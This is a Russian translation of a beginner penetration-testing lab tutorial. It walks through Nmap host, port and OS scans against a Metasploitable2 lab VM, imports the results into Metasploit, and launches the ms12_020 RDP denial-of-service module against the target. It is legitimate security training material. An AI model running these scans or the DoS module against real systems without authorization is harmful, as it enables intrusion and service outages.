Использование Nmap и Metasploit для сканирования сети и анализа уязвимостей

CybersecurityCybersecurityBeginner
Практиковаться сейчас

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом лабораторном занятии вы научитесь использовать Nmap и Metasploit для сканирования сетей и анализа уязвимостей. Nmap (Network Mapper) — это мощный открытый инструмент для обнаружения сетевых ресурсов и проведения аудит безопасности, а Metasploit — широко используемая платформа для пентестинга, которая включает в себя различные эксплойты и полезные нагрузки.

Цель этого лабораторного занятия — дать вам практический опыт в использовании Nmap для выполнения различных типов сканирования, анализа результатов и использования Metasploit для дальнейшего исследования потенциальных уязвимостей на целевой системе.

Настройка среды

На этом шаге вы настроите лабораторную среду, запустив контейнер Kali Linux и виртуальную машину Metasploitable2.

sudo virsh start Metasploitable2

Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.

Проверьте, запущена ли виртуальная машина, отправив ей ping:

ping 192.168.122.102

Далее, запустите контейнер Kali Linux и войдите в его среду bash:

docker run -ti --network host b5b709a49cd5 bash

Проверьте виртуальное сетевое соединение в контейнере Kali, используйте Ctrl-C для выхода из ping:

ping 192.168.122.102

Базовое использование Nmap

На этом шаге вы научитесь использовать Nmap для выполнения базовых задач сканирования, таких как обнаружение хостов, сканирование портов, определение версий и определение операционной системы.

Выполните комплексное сканирование, запустив следующую команду:

nmap -T4 -A 192.168.122.102

Выполните сканирование для обнаружения хостов, запустив следующую команду:

nmap -T4 -sn 192.168.122.102

Выполните сканирование портов, запустив следующую команду:

nmap -T4 192.168.122.102

Выполните определение операционной системы, запустив следующую команду:

nmap -T4 -O 192.168.122.102

Опция -T4 устанавливает шаблон времени для агрессивного сканирования, а опция -A включает определение операционной системы, сканирование версий, сканирование с использованием скриптов и трассировку маршрута. Опция -sn выполняет простое сканирование для обнаружения хостов, а опция -O пытается определить удаленную операционную систему.

Продвинутое использование Nmap

На этом шаге вы познакомитесь с более продвинутыми техниками сканирования с использованием Nmap, такими как сканирование целых подсетей, определенных диапазонов портов и указание сетевого интерфейса.

Сканируйте целую подсеть, запустив следующую команду:

nmap 127.0.0.1/24

Сканируйте определенные порты, запустив следующую команду:

nmap -p80,22,66 127.0.0.1

Выведите список локальных сетевых интерфейсов, запустив следующую команду:

nmap --iflist

Укажите сетевой интерфейс, запустив следующую команду:

nmap -e eth0 127.0.0.1

Эти продвинутые техники позволяют вам настроить сканирование более точно и собрать более детальную информацию о целевой сети или хостах.

Импорт результатов сканирования Nmap в Metasploit

На этом шаге вы научитесь импортировать результаты сканирования Nmap в Metasploit для дальнейшего анализа и эксплойтации.

  1. Выполните комплексное сканирование и сохраните вывод в XML - файл, запустив следующую команду, и убедитесь, что XML - файл находится в домашней директории ~/. Этот шаг может занять некоторое время:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Запустите консоль Metasploit:
cd ~
service postgresql start
msfdb init
msfconsole
  1. Импортируйте XML - файл в Metasploit, запустив следующую команду в консоли Metasploit:
db_import shiyanlou.xml
  1. Просмотрите импортированные сервисы, запустив следующую команду в консоли Metasploit:
services
  1. Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Импортируя результаты сканирования Nmap в Metasploit, вы можете использовать мощные инструменты и модули, доступные в фреймворке Metasploit, для анализа и потенциальной эксплойтации уязвимостей на целевой системе.

Использование модулей в Metasploit

На этом шаге вы научитесь искать и использовать модули в рамках фреймворка Metasploit.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить ее:
cd ~
msfconsole
  1. Теперь вы можете искать модули с помощью команды search в консоли Metasploit:
search ms12-020
  1. Чтобы использовать модуль в консоли Metasploit:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Показать доступные параметры для модуля в консоли Metasploit:
show options
  1. Установить обязательные параметры в консоли Metasploit:
set RHOST 192.168.122.102
  1. Запустить модуль в консоли Metasploit:
exploit
  1. Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Metasploit предоставляет широкий спектр модулей для различных целей, таких как эксплойты, полезные нагрузки, вспомогательные модули и многое другое. Изучая и используя подходящий модуль, вы можете попытаться эксплоитировать уязвимости или выполнить другие действия на целевой системе.

Резюме

В этом лабораторном занятии вы научились использовать Nmap для сканирования сетей и сбора информации, а также импортировать результаты сканирования в Metasploit для дальнейшего анализа и эксплойтации. Вы получили практический опыт работы с различными техниками сканирования Nmap, включая обнаружение хостов, сканирование портов, определение версий и определение операционной системы. Кроме того, вы узнали, как искать и использовать модули в рамках фреймворка Metasploit для потенциальной эксплойтации уязвимостей на целевой системе.

В ходе лабораторной работы вы отработали важные навыки для пенетрационного тестирования, такие как настройка контролируемой среды, проведение разведки и анализ потенциальных уязвимостей. Эти навыки являются важными в области кибербезопасности и помогут вам глубже понять концепции сетевой безопасности и техники этического взлома.